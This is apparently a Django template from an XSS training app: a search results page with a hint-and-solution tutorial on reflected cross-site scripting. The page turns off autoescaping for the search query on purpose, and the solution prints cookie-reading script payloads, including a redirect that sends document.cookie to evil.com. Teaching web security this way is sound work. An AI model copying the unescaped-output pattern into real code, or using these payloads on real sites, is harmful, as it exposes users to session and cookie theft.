{% extends "xss_app/../base.html" %}

{% block title %} Search Results {% endblock %}

{% block content %}
    <div class="list-group">
        {% if object_list %}
            <h1>Search Results</h1>
            <h4>You searched for: </h4><p>{% autoescape off %} {{ search_query }} {% endautoescape %}</p>
            {% for blog_post in object_list %}
                <a href="{% url 'xss_app:detail' blog_post.id %}" class="list-group-item list-group-item-action">
                    <div class="d-flex w-100 justify-content-between">
                        {% if blog_post.malicious_content %}
                            <h5 class="mb-1 truncate" style="color: #FF6961">{{ blog_post.headline }}</h5>
                        {% else %}
                            <h5 class="mb-1 truncate">{{ blog_post.headline }}</h5>
                        {% endif %}
                      <small class="text-muted">Posted on: {{ blog_post.pub_date }}</small>
                    </div>
                        {% if blog_post.malicious_headline %}
                            <p class="mb-1 truncate" style="color: #FF6961">{{ blog_post.content }}</p>
                        {% else %}
                            <p class="mb-1 truncate">{{ blog_post.content }}</p>
                        {% endif %}
                    <small class="text-muted">By: {{ blog_post.author }}</small>
                </a>
            {% endfor %}
        {% else %}
            <h1>No results found!</h1>
            <h4>You searched for: </h4><p>{% autoescape off %} {{ search_query }} {% endautoescape %}</p>
        {% endif %}
    </div>
    <br>
    <br>
    <div id="tutorial">
        <h4>Exercise 1 continued</h4>
        <p>
            You have successfully searched for a blog post! It does not matter if your search yielded results, what
            matters is that you gained information about the search request! Specifically, there are two pieces of
            information you need to test the vulnerability of this search request. Think about the user input and how
            it can be used to run a script. <b>Craft a malicious script to obtain the website's cookie.</b>
            Don't forget to copy it for submission on the main page!
        </p>
        <br>
        <div class="accordion" id="accordionExample">
          <h4>Hints</h4>
          <div class="card">
            <div class="card-header" id="headingOne">
              <h2 class="mb-0">
                <button class="btn btn-light btn-block collapsed" type="button" data-toggle="collapse" data-target="#hint1" aria-expanded="false" aria-controls="hint1">
                  Hint about the information revealed
                </button>
              </h2>
            </div>
            <div id="hint1" class="collapse" aria-labelledby="headingOne">
              <div class="card-body">
                <p>
                    You can read from the URL that it contains a single query parameter called 'q', which is used to search
                    the blog posts. Furthermore, you can see that the query value is rendered onto the web page.
                    Lastly, the presence of a parameter in the URL string reveals that a GET request is used, which is
                    less secure than the POST request.
                    <a href="https://www.baeldung.com/cs/http-get-vs-post" target="_blank">Read more about them here!</a>
                </p>
              </div>
            </div>
          </div>

          <div class="card">
            <div class="card-header" id="headingTwo">
              <h2 class="mb-0">
                <button class="btn btn-light btn-block collapsed" type="button" data-toggle="collapse" data-target="#hint2" aria-expanded="false" aria-controls="hint2">
                  Hint about injecting inline script into HTML
                </button>
              </h2>
            </div>
            <div id="hint2" class="collapse" aria-labelledby="headingTwo">
              <div class="card-body">
                <p>
                    In order to load and run JavaScript in a browser, you have to wrap the code in:
                </p>
                <pre class="code-snippet"><code>&lt;script&gt; Here you can define your JavaScript code &lt;/script&gt;</code></pre>
              </div>
            </div>
          </div>

          <div class="card">
            <div class="card-header" id="headingThree">
              <h2 class="mb-0">
                <button class="btn btn-light btn-block collapsed" type="button" data-toggle="collapse" data-target="#hint3" aria-expanded="false" aria-controls="hint3">
                  Hint about obtaining the cookie
                </button>
              </h2>
            </div>
            <div id="hint3" class="collapse" aria-labelledby="headingThree">
              <div class="card-body">
                <p>
                    In order to access the website's cookie, you can use the JavaScript method <b>document.cookie</b>.
                    You can try this out manually by "Inspecting" the website and typing <b>document.cookie</b> into the console.
                </p>
              </div>
            </div>
          </div>

          <div class="card">
            <div class="card-header" id="headingFour">
              <h2 class="mb-0">
                <button class="btn btn-light btn-block collapsed" type="button" data-toggle="collapse" data-target="#hint4" aria-expanded="false" aria-controls="hint4">
                  Hint about obtaining/displaying contents
                </button>
              </h2>
            </div>
            <div id="hint4" class="collapse" aria-labelledby="headingFour">
              <div class="card-body">
                <p>
                    The easiest and most straightforward ways of obtaining or displaying any value from a website
                    using JavaScript methods would be either by displaying an alert
                </p>
                <pre class="code-snippet"><code>alert(somevalue);</code></pre>
                <p>or by logging the value into the console</p>
                <pre class="code-snippet"><code>console.log(somevalue);</code></pre>
              </div>
            </div>
          </div>

          <div class="card">
            <div class="card-header" id="headingFive">
              <h2 class="mb-0">
                <button class="btn btn-info btn-block collapsed" type="button" data-toggle="collapse" data-target="#solution" aria-expanded="false" aria-controls="solution">
                  Solution
                </button>
              </h2>
            </div>
            <div id="solution" class="collapse" aria-labelledby="headingFive">
              <div class="card-body">
                <p>
                    This is one way of obtaining a cookie from website:
                </p>
                <pre class="code-snippet"><code>&lt;script&gt;alert(document.cookie);&lt;/script&gt;</code></pre>
                <p>
                    ...and this is how a link you could send someone could look like:
                </p>
                <pre class="code-snippet"><code><a href="http://127.0.0.1:8000/xss_app/search/?q=<script>alert(document.cookie);</script>">http://127.0.0.1:8000/xss_app/search/?q=&lt;script&gt;alert(document.cookie);&lt;/script&gt;</a></code></pre>
                <p>
                    Displaying the victim's cookie to themselves is not very useful for the attacker. In a more realistic
                    scenario, the attacker could, for example, send the value of the cookie to their malicious website
                    as a parameter.
                </p>
                <pre class="code-snippet"><code>&lt;script&gt;window.location.replace("http://evil.com/?c=" + document.cookie)&lt;/script&gt;</code></pre>
              </div>
            </div>
          </div>
        </div>
        <br><br>
        <a class="btn btn-primary" href="{% url 'xss_app:index' %}#reflectedExercise" role="button">Back to Exercise 1</a>
        <br><br>
    </div>
{% endblock %}